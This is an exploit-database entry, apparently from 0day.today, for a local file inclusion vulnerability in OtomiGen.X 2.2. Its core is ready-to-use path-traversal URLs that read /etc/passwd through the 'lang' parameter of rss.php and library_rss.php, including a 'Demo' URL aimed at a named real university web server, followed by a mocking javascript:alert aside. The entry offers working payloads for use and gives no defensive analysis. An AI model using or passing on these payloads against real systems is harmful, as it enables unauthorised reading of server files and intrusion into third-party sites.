OtomiGen.X 2.2 (lang) Local File Inclusion Vulnerabilities

2008-05-27T00:00:00
ID 1337DAY-ID-3074
Type zdt
Reporter Saime
Modified 2008-05-27T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==========================================================
OtomiGen.X 2.2 (lang) Local File Inclusion Vulnerabilities
==========================================================



[+] Author: Saime
[+] Script: OtomigenX v2.2 (lang) Local File Inclusion
[+] Date: 28/05/2008
[+] Greetz: BaKo,DrWh4x,optiplex,xprog,cam-man-dan,Tulle,t0pP8uZz,Inspiratio,Novalok,illuz1oN,Untamed,GM,str0ke, and everyone else I forgot!

[+] File: library_rss.php/rss.php
[+] Exploit:
http://localhost/otomigenx/rss.php?lang=../../etc/passwd
http://localhost/otomigenx/library_rss.php?lang=../../etc/passwd
[+] Demo:
http://kmrg.itb.ac.id/otomigenx/library_rss.php?lang=../../../../../etc/passwd
[+] Notes: Don, hows the threaded version going? lololol ( javascript:alert('noob'); ) or should it be plain xss? LOLOL




#  0day.today [2018-02-09]  #